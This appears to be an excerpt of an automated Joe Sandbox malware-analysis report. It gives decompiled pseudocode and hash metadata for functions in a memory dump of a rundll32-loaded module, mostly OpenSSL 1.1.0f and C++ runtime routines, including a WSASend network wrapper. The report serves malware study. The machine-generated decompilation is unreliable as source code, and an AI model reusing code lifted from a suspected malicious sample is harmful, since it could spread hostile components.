                                        • Opcode ID: 390820797747de22af92d93a00ddc41198c1fceb6aa38a6f7fbf486f83de749d
                                        • Instruction ID: 20bb5f6a718b23284637248bd4af299d7e3e06ef357341189f04a93e5f6b308f
                                        • Opcode Fuzzy Hash: 390820797747de22af92d93a00ddc41198c1fceb6aa38a6f7fbf486f83de749d
                                        • Instruction Fuzzy Hash: 0C315E32615B8096EB10DB50E8443CEB7B9F394784F524226EE9C43BA9DF3CC596CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CertCertificateContextProperty
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$capi_cert_get_fname
                                        • API String ID: 665277682-2690582526
                                        • Opcode ID: 79b2cb2b5d6dc7e9a1b933f7a63a3defb7ecdf2f284955527ea9f3f5d724cd80
                                        • Instruction ID: 3563ec1e7ecde7cc4cbc61836ef008c1dafb345ac290986154bb784712f23c0d
                                        • Opcode Fuzzy Hash: 79b2cb2b5d6dc7e9a1b933f7a63a3defb7ecdf2f284955527ea9f3f5d724cd80
                                        • Instruction Fuzzy Hash: CB21717531060082FF509B21ED197DBA3A1AB65BC4F454022ED0947F95EB6DC617CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 18%
                                        			E0000021E21EF2FF33C0(void* __eax, void* __ebx, long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24, intOrPtr _a32, intOrPtr* _a40) {
                                        				long long _v16;
                                        				intOrPtr _v24;
                                        				long long _v40;
                                        				long long _v48;
                                        				intOrPtr _v56;
                                        				intOrPtr _t23;
                                        				intOrPtr _t30;
                                        				void* _t31;
                                        				long long _t37;
                                        
                                        				_t37 = __rax;
                                        				_a8 = __rbx;
                                        				_a16 = __rbp;
                                        				_a24 = __rsi;
                                        				_a32 = r9d;
                                        				__imp__#112();
                                        				_v40 = __rbp;
                                        				r8d = __ebx;
                                        				_v48 = __rbp;
                                        				_t46 = __rdx;
                                        				_t44 = __rcx;
                                        				_v56 = 0;
                                        				_a32 = 0;
                                        				__imp__WSASend();
                                        				_t31 = __eax;
                                        				_t23 = E0000021E21EF310D880(__rcx, __rdx);
                                        				__imp__#111();
                                        				_v16 = _t37;
                                        				_v24 = _t23;
                                        				asm("movups xmm0, [esp+0x40]");
                                        				asm("movups [ebx], xmm0");
                                        				_t30 =  *_a40;
                                        				if (_t30 != 0x40) goto 0xf2ff344c;
                                        				_v24 = 0x2746;
                                        				goto 0xf2ff345c;
                                        				if (_t30 != 0x4d2) goto 0xf2ff346e;
                                        				_v24 = 0x274d;
                                        				E0000021E21EF310D880(_t44, __rdx);
                                        				_v16 = _t37;
                                        				asm("movups xmm0, [esp+0x40]");
                                        				asm("movups [ebx], xmm0");
                                        				if (_t31 == 0) goto 0xf2ff3477;
                                        				goto 0xf2ff3491;
                                        				_v24 = 0;
                                        				E0000021E21EF310D880(_t44, _t46);
                                        				_v16 = _t37;
                                        				asm("movups xmm0, [esp+0x40]");
                                        				asm("movups [ebx], xmm0");
                                        				return _a32;
                                        			}













                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$Init_thread_footerSend
                                        • String ID: M'
                                        • API String ID: 4113865755-2701432540
                                        • Opcode ID: a6bb5aa9432d96d1bfa01b45ed6e4aac2997189b46e14d0127da5340bd9af3fd
                                        • Instruction ID: 8096668e2da2657e0d195773d76d0f993abbd22615b35f892f7a965e4e0c2af4
                                        • Opcode Fuzzy Hash: a6bb5aa9432d96d1bfa01b45ed6e4aac2997189b46e14d0127da5340bd9af3fd
                                        • Instruction Fuzzy Hash: 16216072908B8087EB118F24F94429AB7B0F799B84F254219EFC907F59DF3CD4918B44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Event$InformationObjectSourceUser$AddressDeregisterErrorHandleLastMessageModuleProcProcessRegisterReportStationWindow_invalid_parameter_noinfowcsstr
                                        • String ID: OpenSSL
                                        • API String ID: 1804357490-773864679
                                        • Opcode ID: 86ec71efb7cfdb46ea702f6dd2606ec8eb9623775bbf656fafa1927dea9f0af4
                                        • Instruction ID: b6c7e2e90a220ec52bcce2257f7c396187e196bace9308f9bf14e317ddd5141d
                                        • Opcode Fuzzy Hash: 86ec71efb7cfdb46ea702f6dd2606ec8eb9623775bbf656fafa1927dea9f0af4
                                        • Instruction Fuzzy Hash: BB115C32204A808AEB309F20FC583DB73A4FB98798F45552AAE4907F59DF3CC296C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Event$InformationObjectSourceUser$AddressDeregisterErrorHandleLastMessageModuleProcProcessRegisterReportStationWindow_invalid_parameter_noinfowcsstr
                                        • String ID: OpenSSL
                                        • API String ID: 1804357490-773864679
                                        • Opcode ID: 26c6716afbaf5caacc0329c87e0c4a82709509a95590302a30f5eef5bf49bed6
                                        • Instruction ID: 808c64cd0b619250ef1872cd7db7c0089118740ec5f1f2f3b6372f189754511d
                                        • Opcode Fuzzy Hash: 26c6716afbaf5caacc0329c87e0c4a82709509a95590302a30f5eef5bf49bed6
                                        • Instruction Fuzzy Hash: C6113A72204A908AEB209F24FC593DB33A4FB98798F45552AAE4947F59DF3DC296C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: abort
                                        • String ID: MessageBoxA$MessageBoxW$SystemFunction036
                                        • API String ID: 4206212132-4003445312
                                        • Opcode ID: 22431766f3e9a50f9fdd398c7b9f585b24de9f0e21ebaef1e5bb0c69857cb8c8
                                        • Instruction ID: faca64fef5b7556de6690738ec764fadddc7ac1e1dc110b2d967e2d7548cc469
                                        • Opcode Fuzzy Hash: 22431766f3e9a50f9fdd398c7b9f585b24de9f0e21ebaef1e5bb0c69857cb8c8
                                        • Instruction Fuzzy Hash: F1116A30200B4581FE159FA5AD583DB63B0E76A751F864022AD1D03BA5EE7CC64FD300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: CoSetProxyBlanket$ole32.dll
                                        • API String ID: 1646373207-1829017490
                                        • Opcode ID: ab3a54a3bf3aca8defbc1a656ff67811e1a416d1a790af5c09cc7e4d7e90e107
                                        • Instruction ID: 04d06f07462694dfcca1488a5d1cc301aa6080e7ca7468a769cdccf7f69a8cd5
                                        • Opcode Fuzzy Hash: ab3a54a3bf3aca8defbc1a656ff67811e1a416d1a790af5c09cc7e4d7e90e107
                                        • Instruction Fuzzy Hash: 49018032205A4085EF62DF15EC5879A73A0FBA8B98F5645228E0E47E64DF3CC18AC700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 41%
                                        			E0000021E21EF30330F6(void* __ebx, void* __rbx, void* __rcx, void* __rdx, void* __rsi, void* __rbp, void* __r8, intOrPtr _a32, void* _a64, void* _a80, void* _a88) {
                                        				long _t9;
                                        				void* _t23;
                                        				char* _t28;
                                        
                                        				_t32 = __rbp;
                                        				_t30 = __rsi;
                                        				_t27 = __rdx;
                                        				_t26 = __rcx;
                                        				_t24 = __rbx;
                                        				if (fflush(??) != 0xffffffff) goto 0xf3033157;
                                        				_t9 = GetLastError();
                                        				_a32 = 0x140;
                                        				r8d = _t9;
                                        				_t2 = _t27 - 0x10; // 0x2
                                        				E0000021E21EF30222D0(_t2, 0x12, fflush(??) - 0xffffffff, _t23, __rbx, __rcx, __rdx, __rsi, __rbp, "..\\..\\openssl-1.1.0f\\crypto\\bio\\bss_file.c");
                                        				_t28 = "fflush()";
                                        				E0000021E21EF3021640(__ebx, _t23, _t28, __r8, "..\\..\\openssl-1.1.0f\\crypto\\bio\\bss_file.c");
                                        				_a32 = 0x142;
                                        				r8d = 2;
                                        				_t4 = _t28 - 0x54; // 0x20
                                        				E0000021E21EF30222D0(_t4, 0x74, fflush(??) - 0xffffffff, _t23, _t24, _t26, _t28, _t30, _t32, "..\\..\\openssl-1.1.0f\\crypto\\bio\\bss_file.c");
                                        				return 0;
                                        			}







                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLastfflush
                                        • String ID: ..\..\openssl-1.1.0f\crypto\bio\bss_file.c$fflush()
                                        • API String ID: 1518747402-499447299
                                        • Opcode ID: bc3521dacd8d2c7673284ac5e40c186babd71deab1d338da691f8a2604399af7
                                        • Instruction ID: 7e1aee03073d65f9c7721bfab164b45f9bd0d2488086f7ee040885ee78cbad5b
                                        • Opcode Fuzzy Hash: bc3521dacd8d2c7673284ac5e40c186babd71deab1d338da691f8a2604399af7
                                        • Instruction Fuzzy Hash: 63F06D3230054082EB609F65EC492CBB760F364794F420226EE4983FE6DB7DC64ACB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 63%
                                        			E0000021E21EF30193A0(signed int __ebx, signed int __esi, void* __eflags, intOrPtr* __rcx, intOrPtr* __rdx, void* __r9) {
                                        				void* __rbx;
                                        				void* __rdi;
                                        				void* __rsi;
                                        				void* _t116;
                                        				signed int _t117;
                                        				void* _t135;
                                        				void* _t137;
                                        				intOrPtr* _t155;
                                        				void* _t187;
                                        				long long _t188;
                                        				intOrPtr* _t199;
                                        				long long* _t209;
                                        				void* _t220;
                                        				long long* _t221;
                                        				void* _t223;
                                        				void* _t225;
                                        				intOrPtr _t226;
                                        				void* _t228;
                                        				intOrPtr* _t229;
                                        				void* _t231;
                                        				void* _t232;
                                        				void* _t234;
                                        				long long _t237;
                                        				void* _t239;
                                        				long long _t240;
                                        				void* _t242;
                                        				intOrPtr* _t243;
                                        				void* _t245;
                                        				intOrPtr* _t246;
                                        
                                        				_t117 = __ebx;
                                        				_t239 = _t231;
                                        				 *(_t239 + 0x20) = r9d;
                                        				 *((long long*)(_t239 + 8)) = __rcx;
                                        				_t232 = _t231 - 0x40;
                                        				 *((long long*)(_t239 - 0x58)) = 0xfffffffe;
                                        				_t246 = __rdx;
                                        				_t243 = __rcx;
                                        				r12d = 0;
                                        				 *(_t239 + 0x20) = r12d;
                                        				 *((long long*)(__rcx)) = 0xf31b6ea8;
                                        				_t229 = __rcx + 0x10;
                                        				 *_t229 = 0xf31b6dc8;
                                        				 *((long long*)(__rcx + 0x98)) = 0xf31b6dd8;
                                        				 *(_t239 + 0x20) = 1;
                                        				 *((long long*)( *((intOrPtr*)( *__rcx + 4)) + __rcx)) = 0xf31b6ea0;
                                        				 *((intOrPtr*)( *((intOrPtr*)( *__rcx + 4)) + __rcx - 4)) =  *((intOrPtr*)( *__rcx + 4)) - 0x18;
                                        				 *((long long*)(__rcx + 8)) = _t240;
                                        				_t155 =  *__rcx;
                                        				_t225 =  *((intOrPtr*)(_t155 + 4)) + __rcx;
                                        				 *((long long*)(_t225 + 0x40)) = _t240;
                                        				 *((long long*)(_t225 + 8)) = _t240;
                                        				 *(_t225 + 0x14) = r12d;
                                        				 *((intOrPtr*)(_t225 + 0x18)) = 0x201;
                                        				 *((long long*)(_t225 + 0x20)) = 6;
                                        				 *((long long*)(_t225 + 0x28)) = _t240;
                                        				 *((long long*)(_t225 + 0x30)) = _t240;
                                        				 *((long long*)(_t225 + 0x38)) = _t240;
                                        				r8d = 0;
                                        				E0000021E21EF3018890(0, __eflags, _t225);
                                        				E0000021E21EF310B674(_t155, _t225);
                                        				_t188 = _t155;
                                        				E0000021E21EF310A500(1, _t188, _t225, _t234);
                                        				 *((long long*)(_t188 + 8)) = _t155;
                                        				 *((long long*)(_t225 + 0x40)) = _t188;
                                        				_t221 = _t243 + 0x18;
                                        				 *((long long*)(_t225 + 0x48)) = _t221;
                                        				 *((long long*)(_t225 + 0x50)) = _t240;
                                        				E0000021E21EF3018948(_t225, _t232 + 0x28);
                                        				E0000021E21EF3018F94(_t155, _t155);
                                        				_t199 =  *((intOrPtr*)(_t232 + 0x30));
                                        				if (_t199 == 0) goto 0xf30194c5;
                                        				 *((intOrPtr*)( *_t199 + 0x10))(_t245, _t242, _t240, _t220, _t223, _t228, _t187);
                                        				if (_t155 == 0) goto 0xf30194c5;
                                        				 *((intOrPtr*)( *_t155))();
                                        				 *((char*)(_t225 + 0x58)) =  *((intOrPtr*)( *_t155 + 0x40))();
                                        				if ( *((intOrPtr*)(_t225 + 0x48)) != _t240) goto 0xf30194eb;
                                        				r8d = 0;
                                        				E0000021E21EF3018890( *(_t225 + 0x10) | 0x00000004,  *((intOrPtr*)(_t225 + 0x48)) - _t240, _t225);
                                        				 *((long long*)(_t232 + 0x88)) = _t229;
                                        				 *((long long*)( *((intOrPtr*)( *_t229 + 4)) + _t229)) = 0xf31b6eb8;
                                        				 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4)) + _t229 - 4)) =  *((intOrPtr*)( *_t229 + 4)) - 0x10;
                                        				 *((long long*)( *((intOrPtr*)( *_t243 + 4)) + _t243)) = 0xf31b6de8;
                                        				 *((intOrPtr*)( *((intOrPtr*)( *_t243 + 4)) + _t243 - 4)) =  *((intOrPtr*)( *_t243 + 4)) - 0x20;
                                        				 *((long long*)( *((intOrPtr*)( *_t243 + 4)) + _t243)) = 0xf31b6e90;
                                        				 *((intOrPtr*)( *((intOrPtr*)( *_t243 + 4)) + _t243 - 4)) =  *((intOrPtr*)( *_t243 + 4)) - 0x98;
                                        				 *((long long*)(_t232 + 0x88)) = _t221;
                                        				 *_t221 = 0xf31b6d08;
                                        				E0000021E21EF310B674(0xf31b6d08,  *((intOrPtr*)( *_t243 + 4)));
                                        				E0000021E21EF310A500(1, 0xf31b6d08, _t225,  *_t155);
                                        				 *0x21EF31B6D10 = 0xf31b6d08;
                                        				 *((long long*)(_t221 + 0x60)) = 0xf31b6d08;
                                        				 *((long long*)(_t221 + 0x18)) = _t221 + 8;
                                        				_t209 = _t221 + 0x10;
                                        				 *((long long*)(_t221 + 0x20)) = _t209;
                                        				 *((long long*)(_t221 + 0x38)) = _t221 + 0x28;
                                        				 *((long long*)(_t221 + 0x40)) = _t221 + 0x30;
                                        				 *(_t221 + 0x50) = _t221 + 0x48;
                                        				 *(_t221 + 0x58) = _t221 + 0x4c;
                                        				 *_t209 = _t240;
                                        				 *((long long*)( *((intOrPtr*)(_t221 + 0x40)))) = _t240;
                                        				 *( *(_t221 + 0x58)) = r12d;
                                        				 *((long long*)( *((intOrPtr*)(_t221 + 0x18)))) = _t240;
                                        				 *((long long*)( *((intOrPtr*)(_t221 + 0x38)))) = _t240;
                                        				 *( *(_t221 + 0x50)) = r12d;
                                        				 *_t221 = 0xf31b6df8;
                                        				_t226 =  *((intOrPtr*)(_t246 + 0x10));
                                        				if ( *((long long*)(_t246 + 0x18)) - 0x10 < 0) goto 0xf30195f6;
                                        				 *((long long*)(_t221 + 0x68)) = _t240;
                                        				 *(_t221 + 0x70) = r12d;
                                        				if (_t226 == 0) goto 0xf3019696;
                                        				r8b = 1;
                                        				E0000021E21EF2FE5C20(_t226,  *_t199);
                                        				_t116 = E0000021E21EF310DC90(1, _t135, __esi, _t137, 0xf31b6df8,  *_t246, _t221, _t226, _t226);
                                        				_t237 = 0xf31b6df8 + _t226;
                                        				 *((long long*)(_t221 + 0x68)) = _t237;
                                        				if (( *(_t221 + 0x70) & 0x00000004) != 0) goto 0xf301964a;
                                        				 *((long long*)( *((intOrPtr*)(_t221 + 0x18)))) = 0xf31b6df8;
                                        				 *((long long*)( *((intOrPtr*)(_t221 + 0x38)))) = 0xf31b6df8;
                                        				 *( *(_t221 + 0x50)) = __esi;
                                        				if (( *(_t221 + 0x70) & 0x00000002) != 0) goto 0xf3019692;
                                        				_t219 =  !=  ? _t237 : 0xf31b6df8;
                                        				 *((long long*)( *((intOrPtr*)(_t221 + 0x20)))) = 0xf31b6df8;
                                        				 *((long long*)( *((intOrPtr*)(_t221 + 0x40)))) =  !=  ? _t237 : 0xf31b6df8;
                                        				 *( *(_t221 + 0x58)) = _t117 - 1 + __esi;
                                        				if ( *((intOrPtr*)( *((intOrPtr*)(_t221 + 0x38)))) != _t240) goto 0xf3019692;
                                        				 *((long long*)( *((intOrPtr*)(_t221 + 0x18)))) = 0xf31b6df8;
                                        				 *((long long*)( *((intOrPtr*)(_t221 + 0x38)))) = _t240;
                                        				 *( *(_t221 + 0x50)) = _t117;
                                        				 *(_t221 + 0x70) =  *(_t221 + 0x70) | 0x00000001;
                                        				return _t116;
                                        			}

































                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Lockitstd::_$std::locale::_$Lockit::_Lockit::~_$Init$ExceptionLocimpLocimp::_New_SetgloballocaleThrowYarn
                                        • String ID:
                                        • API String ID: 2068841532-0
                                        • Opcode ID: eb7ad89f49aa584f082ae8ad4cc002c2f8a81b6d389ffc47559d48b210139343
                                        • Instruction ID: 4d5ca8b2034ed96f8db7a47a16c00cbedd90d49d06de13f44cfa74f8046e19ab
                                        • Opcode Fuzzy Hash: eb7ad89f49aa584f082ae8ad4cc002c2f8a81b6d389ffc47559d48b210139343
                                        • Instruction Fuzzy Hash: BAA14732201F4496DB10CF2AE98869D77B4F798B98B568226CF9D43B60EF39D076C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 92%
                                        			E0000021E21EF3121BA4(signed int __edx, void* __edi, void* __esp, intOrPtr* __rax, long long __rbx, signed int* __rcx, void* __rdx, long long __rsi, void* __r8, long long _a8, long long _a24, signed short _a32, intOrPtr _a40) {
                                        				void* _v8;
                                        				char _v16;
                                        				intOrPtr* _v32;
                                        				char _v40;
                                        				void* __rdi;
                                        				void* _t17;
                                        				intOrPtr* _t43;
                                        				void* _t55;
                                        
                                        				_a8 = __rbx;
                                        				_a24 = __rsi;
                                        				_a32 = r9w;
                                        				_t55 = __rdx;
                                        				if (__rdx != 0) goto 0xf3121bda;
                                        				if (__r8 == 0) goto 0xf3121bda;
                                        				if (__rcx == 0) goto 0xf3121bd3;
                                        				 *__rcx =  *__rcx & __edx;
                                        				goto 0xf3121c69;
                                        				if (__rcx == 0) goto 0xf3121be2;
                                        				 *__rcx =  *__rcx | 0xffffffff;
                                        				if (__r8 - 0x7fffffff <= 0) goto 0xf3121bfe;
                                        				_t17 = E0000021E21EF3118984(__rax);
                                        				 *__rax = 0x16;
                                        				E0000021E21EF3111BC8(_t17);
                                        				goto 0xf3121c67;
                                        				E0000021E21EF3111664(__rax, __rcx,  &_v40, _a40);
                                        				_t43 = _v32;
                                        				if ( *((long long*)(_t43 + 0x138)) != 0) goto 0xf3121c98;
                                        				if ((_a32 & 0x0000ffff) - 0xff <= 0) goto 0xf3121c7b;
                                        				if (_t55 == 0) goto 0xf3121c48;
                                        				if (__r8 == 0) goto 0xf3121c48;
                                        				E0000021E21EF310E410(0xff, 0, __edi, __esp, _t55, _a40, __r8, __r8);
                                        				E0000021E21EF3118984(_t43);
                                        				 *_t43 = 0x2a;
                                        				if (_v16 == 0) goto 0xf3121c67;
                                        				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
                                        				return 0x2a;
                                        			}












                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                        • String ID:
                                        • API String ID: 4141327611-0
                                        • Opcode ID: 49d77ae0b775df07605cd79664d0e3d06cc87af61a22bad7434ff002173df99d
                                        • Instruction ID: fb291615a78600fce27f9e4bd39b5f25e2c0b7676d58003c859e00603e1e2908
                                        • Opcode Fuzzy Hash: 49d77ae0b775df07605cd79664d0e3d06cc87af61a22bad7434ff002173df99d
                                        • Instruction Fuzzy Hash: 2E41903620478086FF75DF5198493EBA2F0EBA1B94F2681349E9587ED6DA3DC853CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 29%
                                        			E0000021E21EF3032F99(signed int __ebx, signed int __edi, void* __rax, void* __rbx, long long __rsi, void* __rbp, void* __r8, void* __r10, void* __r14, long long _a32, long long _a40, void* _a64, char _a72, void* _a80, void* _a88) {
                                        				long _t45;
                                        				long _t49;
                                        				signed int _t55;
                                        				signed int _t66;
                                        				long long _t81;
                                        				void* _t88;
                                        				void* _t89;
                                        				long long _t92;
                                        				signed short* _t99;
                                        				signed short* _t100;
                                        				long long _t102;
                                        				long long* _t110;
                                        
                                        				_t104 = __rbp;
                                        				_t102 = __rsi;
                                        				_t82 = __rbx;
                                        				_t66 = __edi;
                                        				E0000021E21EF3033250(__rax, __rsi);
                                        				 *(__rsi + 0x1c) = __edi & __ebx;
                                        				if ((dil & 0x00000008) == 0) goto 0xf3032fd1;
                                        				r8d = 4;
                                        				if ((dil & 0x00000002) == 0) goto 0xf3032fc8;
                                        				goto 0xf303300e;
                                        				goto 0xf303300e;
                                        				if ((__edi & 0x00000006) != 6) goto 0xf3032fe3;
                                        				goto 0xf3033003;
                                        				if ((dil & 0x00000004) == 0) goto 0xf3032ff2;
                                        				goto 0xf3033003;
                                        				if ((dil & 0x00000002) == 0) goto 0xf30330d2;
                                        				r8d = 4;
                                        				E0000021E21EF3025650(__rax,  &_a72, "r", __r8, __r10);
                                        				_t88 =  &_a72 - 1;
                                        				if ((dil & 0x00000010) != 0) goto 0xf3033034;
                                        				_t89 = _t88 + 1;
                                        				if ( *((char*)(_t88 + 1)) != 0) goto 0xf3033021;
                                        				goto 0xf3033045;
                                        				if ( *((char*)(_t89 + 1)) != 0) goto 0xf3033034;
                                        				 *((short*)(_t89 + 1)) = "t" & 0x0000ffff;
                                        				0xf304d840();
                                        				if (__rax != 0) goto 0xf30330bc;
                                        				_t45 = GetLastError();
                                        				_a32 = 0x124;
                                        				r8d = _t45;
                                        				E0000021E21EF30222D0(2, __ebx, __rax, __rax, __rbx, __r14,  &_a72, __rsi, __rbp, "..\\..\\openssl-1.1.0f\\crypto\\bio\\bss_file.c");
                                        				_a40 = "\')";
                                        				_t110 = "\',\'";
                                        				_t81 =  &_a72;
                                        				_t99 = "fopen(\'";
                                        				_a32 = _t81;
                                        				E0000021E21EF3021640(5, _t81, _t99, __r14, _t110);
                                        				_a32 = 0x126;
                                        				goto 0xf303313b;
                                        				 *((long long*)(_t102 + 0x30)) = _t81;
                                        				_t92 = _t102;
                                        				 *((intOrPtr*)(_t102 + 0x18)) = __ebx;
                                        				0xf3022a70();
                                        				goto 0xf3033157;
                                        				_a32 = 0x118;
                                        				r8d = 0x65;
                                        				if (__r14 == 0) goto 0xf3033157;
                                        				 *_t110 = _t92;
                                        				_t55 =  *(_t102 + 0x1c);
                                        				goto 0xf3033157;
                                        				 *(_t102 + 0x1c) = _t66;
                                        				if (fflush() != 0xffffffff) goto 0xf3033157;
                                        				_t49 = GetLastError();
                                        				_a32 = 0x140;
                                        				r8d = _t49;
                                        				_t31 = _t99 - 0x10; // 0x2
                                        				E0000021E21EF30222D0(_t31, 0x12, fflush() - 0xffffffff, _t81, _t82, _t92, _t99, _t102, _t104, "..\\..\\openssl-1.1.0f\\crypto\\bio\\bss_file.c");
                                        				_t100 = "fflush()";
                                        				E0000021E21EF3021640(_t55, _t81, _t100, __r14, "..\\..\\openssl-1.1.0f\\crypto\\bio\\bss_file.c");
                                        				_a32 = 0x142;
                                        				r8d = 2;
                                        				_t33 = _t100 - 0x54; // 0x20
                                        				E0000021E21EF30222D0(_t33, 0x74, fflush() - 0xffffffff, _t81, _t82, _t92, _t100, _t102, _t104, "..\\..\\openssl-1.1.0f\\crypto\\bio\\bss_file.c");
                                        				return 0;
                                        			}
















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast
                                        • String ID: ','$..\..\openssl-1.1.0f\crypto\bio\bss_file.c$fopen('
                                        • API String ID: 1452528299-1553173387
                                        • Opcode ID: a4f32deb7fbc851700f2b082ecaef4f55a488856d07c6e0b130c4b594f97a7e0
                                        • Instruction ID: d59471a8a47b040321ddf524e7e83f3c023fc607628e4305a069f75c16239f7a
                                        • Opcode Fuzzy Hash: a4f32deb7fbc851700f2b082ecaef4f55a488856d07c6e0b130c4b594f97a7e0
                                        • Instruction Fuzzy Hash: 36415832304A4185FF64CF09DC893EBA7A1A3A5750F864117DE8D86EA5EB7DC64BC740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 50%
                                        			E0000021E21EF3000570(long long __rbx, long long* __rcx, signed long long __rdx, long long _a8, long long _a16, long long _a24) {
                                        				long long _v40;
                                        				void* _t22;
                                        				void* _t23;
                                        				long long _t32;
                                        				long long _t38;
                                        				signed int _t41;
                                        				signed long long _t44;
                                        				long long _t46;
                                        				long long* _t47;
                                        				signed long long _t48;
                                        
                                        				_t44 = __rdx;
                                        				_a16 = __rdx;
                                        				_v40 = 0xfffffffe;
                                        				_a8 = __rbx;
                                        				_t48 = __rdx;
                                        				_t47 = __rcx;
                                        				if (__rdx != 0) goto 0xf300059a;
                                        				goto 0xf30005ed;
                                        				if (__rdx - 0xffffffff <= 0) goto 0xf30005af;
                                        				E0000021E21EF310A170(0xffffffff);
                                        				asm("int3");
                                        				_t41 = _t44 * 8;
                                        				if (_t41 - 0x1000 < 0) goto 0xf30005e5;
                                        				_t32 = _t41 + 0x27;
                                        				if (_t32 - _t41 > 0) goto 0xf30005cf;
                                        				E0000021E21EF310A170(_t32);
                                        				asm("int3");
                                        				E0000021E21EF310B674(_t32, _t32);
                                        				_t6 = _t32 + 0x27; // 0x27
                                        				 *((long long*)((_t6 & 0xffffffe0) - 8)) = _t32;
                                        				goto 0xf30005ed;
                                        				_t22 = E0000021E21EF310B674(_t32, _t32);
                                        				_t38 = _t32;
                                        				_a24 = _t38;
                                        				_t23 = E0000021E21EF3006760(_t22,  *_t47,  *((intOrPtr*)(_t47 + 8)), _t38);
                                        				_t46 =  *_t47;
                                        				if (_t46 == 0) goto 0xf3000625;
                                        				0xf30006e0();
                                        				 *((long long*)(_t47 + 0x10)) = _t38 + _t48 * 8;
                                        				 *((long long*)(_t47 + 8)) = _t38 + ( *((intOrPtr*)(_t47 + 8)) - _t46 >> 3) * 8;
                                        				 *_t47 = _t38;
                                        				return _t23;
                                        			}














                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task
                                        • String ID:
                                        • API String ID: 118556049-0
                                        • Opcode ID: 89cfd26d850f7974e19e0b8867d82d8511561a90e7ace9660613bfa6d740ea21
